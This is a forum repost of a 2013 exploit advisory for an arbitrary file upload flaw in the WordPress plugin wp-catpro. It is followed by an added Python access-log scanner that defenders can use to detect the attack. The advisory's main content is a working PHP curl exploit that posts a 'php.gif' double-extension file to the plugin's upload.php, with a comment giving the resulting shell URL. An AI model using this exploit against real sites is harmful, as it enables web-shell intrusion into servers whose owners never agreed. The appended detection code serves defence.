China Network Penetration Testing Alliance
Title: WordPress plugin wp-catpro arbitrary file upload
Author: admin
Time: 2013-2-27 20:12
Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
#-----------------------------------------------------------------------
Author => Zikou-16
Email => zikou16x@gmail.com
Tested on : Windows 7 , Backtrack 5r3
Download link : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
####

#=> Exploit information:
------------------
# An attacker can upload file/shell.php.gif
# ("jpg", "gif", "png") // Allowed file extensions
# "/uploads/"; // The path where we will save the file (getcwd() may not be reliable and should be tested in your environment)
# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
------------------
#=> Exploit
-----------
<?php

$uploadfile="zik.php.gif";
$ch = curl_init("http://[www.2cto.com]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
        array('Filedata'=>"@$uploadfile",
        'folder'=>'/wp-content/uploads/catpro/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);

print "$postResult";

// Shell Access : http://[www.xxx.com]/[path]/wp-content/uploads/catpro/random_name.php.gif

?>
<?php
phpinfo();
?>
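Added example, not part of the original post: a log check a defender can use to look for the two request patterns this advisory describes, a POST to the plugin's `upload.php` and any request under `wp-content/uploads/` for a file with an executable extension hidden before the final one. The endpoint and upload paths come from the advisory; the combined access-log format, the extension list, the `/blog` prefix and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote

# Paths taken from the advisory above.
UPLOAD_ENDPOINT = "/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php"
UPLOAD_DIR = "/wp-content/uploads/"
# Assumed list of extensions a PHP-enabled server may hand to the interpreter.
EXEC_EXTS = {"php", "php3", "php4", "php5", "phtml", "phar"}

# Combined log format: ip - - [time] "METHOD uri PROTO" status size ...
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')


def has_exec_ext(filename):
    """True if ANY extension segment is executable, not just the last one."""
    return any(seg in EXEC_EXTS for seg in filename.lower().split(".")[1:])


def scan(lines):
    """Return (ip, reason, path, status) for requests matching the advisory."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not an access-log line in the assumed format
        ip, method, uri, status = m.groups()
        path = unquote(urlsplit(uri).path)  # decode %2E-style obfuscation
        if method == "POST" and path.endswith(UPLOAD_ENDPOINT):
            hits.append((ip, "post-to-upload-endpoint", path, int(status)))
        elif UPLOAD_DIR in path and has_exec_ext(path.rsplit("/", 1)[-1]):
            hits.append((ip, "exec-ext-under-uploads", path, int(status)))
    return hits


# Constructed sample lines (documentation IP ranges, hypothetical /blog prefix).
SAMPLE = [
    '198.51.100.7 - - [27/Feb/2013:20:01:11 +0000] "POST /blog' + UPLOAD_ENDPOINT
    + ' HTTP/1.1" 200 31 "-" "-"',
    '198.51.100.7 - - [27/Feb/2013:20:01:15 +0000] "GET /blog/wp-content/uploads/'
    'catpro/random_name.php.gif HTTP/1.1" 200 512 "-" "-"',
    '203.0.113.9 - - [27/Feb/2013:20:02:00 +0000] "GET /blog/wp-content/uploads/'
    '2013/02/photo.gif HTTP/1.1" 200 20480 "-" "-"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(hit)
```

Feed `scan()` the lines of the site's access log; an `exec-ext-under-uploads` hit answered with status 200 is the one to triage first.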